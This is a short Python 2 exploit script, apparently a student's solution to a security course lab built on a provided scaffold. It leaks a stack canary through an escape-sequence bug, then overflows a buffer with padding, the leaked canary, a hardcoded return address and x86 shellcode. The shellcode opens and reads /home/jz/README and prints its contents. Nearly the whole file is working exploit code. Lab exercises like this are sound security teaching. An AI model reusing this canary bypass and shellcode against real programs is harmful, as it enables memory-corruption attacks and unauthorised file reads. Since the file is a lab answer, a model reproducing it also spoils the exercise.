#!/usr/bin/env python 

from scaffold import *

### YOUR CODE STARTS HERE ###

shellcode = \
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2" \
"\xeb\x32\x5b\xb0\x05\x31\xc9\xcd" \
"\x80\x89\xc6\xeb\x06\xb0\x01\x31" \
"\xdb\xcd\x80\x89\xf3\xb0\x03\x83" \
"\xec\x01\x8d\x0c\x24\xb2\x01\xcd" \
"\x80\x31\xdb\x39\xc3\x74\xe6\xb0" \
"\x04\xb3\x02\xb2\x01\xcd\x80\x83" \
"\xc4\x01\xeb\xdf\xe8\xc9\xff\xff" \
"\xff/home/jz/README"

initialexploit = "A" * 13  + "\\x"

p.send(initialexploit + "\n")

output = p.recvline()

canary = output[14:17] 

print "canary:", canary + "canarrend" 
print "size:", len(canary)

padding = "A" * 32
eip = "\xa4\xfa\xff\xbf"
p.send(padding + "\\x00" + canary + "A" * 4 + eip + shellcode + "\n")

### YOUR CODE  ENDS  HERE ###

returncode = p.end()

if returncode == -6: print 'stack canary triggered!'
elif returncode == -11: print 'segmentation fault!'
elif returncode != 0: print 'return code', returncode
